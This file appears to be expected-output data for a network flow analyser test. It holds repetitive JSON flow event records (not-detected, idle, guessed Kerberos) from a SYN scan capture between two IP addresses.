+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 